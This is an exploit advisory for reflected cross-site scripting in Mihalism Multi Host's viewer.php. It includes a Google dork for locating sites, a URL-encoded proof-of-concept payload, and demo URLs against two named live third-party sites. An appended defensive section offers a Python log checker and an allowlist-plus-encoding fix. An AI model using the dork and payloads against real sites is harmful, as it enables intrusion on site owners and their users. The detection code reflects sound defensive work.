#########################################################################################################################
# #
# Exploit Title : Mihalism Multi Host v 5.0 XSS Vulnerabilities #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : http://www.mihalismscript.com #
# #
# Tested ON : All ver 0f Mihalism Multi Host #
# #
# Security Risk : Low #
# #
# Description : All targets are Iranian uploader websites #
# #
# DorK : "intext:"powered by Mihalism Multi Host"" #
# #
# #
# #
#########################################################################################################################
Details :
The vulnerable file is "viewer.php"; the payload is passed in its "file" parameter.
XSS Expl0iTs :
http://Target/viewer.php?is_random=45041&file=XSS Codes
Dem0 :
http://picoup.ir/viewer.php?is_random=45041&file=%3CBODY+onload%3D%22javascript%3Aalert%28%27E1%27%29%22%3E
Dem0 :
http://www.img.songsara.net/viewer.php?is_random=45041&file=%3CBODY+onload%3D%22javascript%3Aalert%28%27E1%27%29%22%3E
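
Added example (not part of the original advisory, and not Mihalism Multi Host code): a log check that finds viewer.php requests whose "file" value, once URL-decoded, is not a plain file name. Assumptions: the web server writes common/combined-format access logs and legitimate "file" values match the SAFE_FILE pattern; the log lines and the names SAFE_FILE, REQUEST, SAMPLE_LOG and suspicious_file_values are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: a legitimate `file` value is a plain image file name.
SAFE_FILE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,254}")
# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /viewer.php?is_random=45041&file=holiday_01.jpg HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /viewer.php?is_random=45041&file=%3CBODY+onload%3D%22javascript'
    '%3Aalert%28%27E1%27%29%22%3E HTTP/1.1" 200 4876',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /index.php?file=%3Cb%3E HTTP/1.1" 200 901',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] '
    '"GET /viewer.php?file=%253Cscript%253E HTTP/1.1" 200 4876',
]


def suspicious_file_values(log_lines):
    """Return (line_number, decoded_value) for each viewer.php request
    whose `file` parameter is not a plain file name."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/viewer.php"):
            continue
        # parse_qs decodes %XX sequences and turns '+' into a space.
        values = parse_qs(url.query, keep_blank_values=True).get("file", [])
        for value in values:
            # Allowlist check: markup, quotes, spaces and a leftover '%'
            # from double encoding all fail it.
            if not SAFE_FILE.fullmatch(value):
                hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in suspicious_file_values(SAMPLE_LOG):
        print(f"line {number}: file={value!r}")
```

The same allowlist, applied server-side before the value is written into the page and combined with HTML-encoding on output, is the corresponding fix.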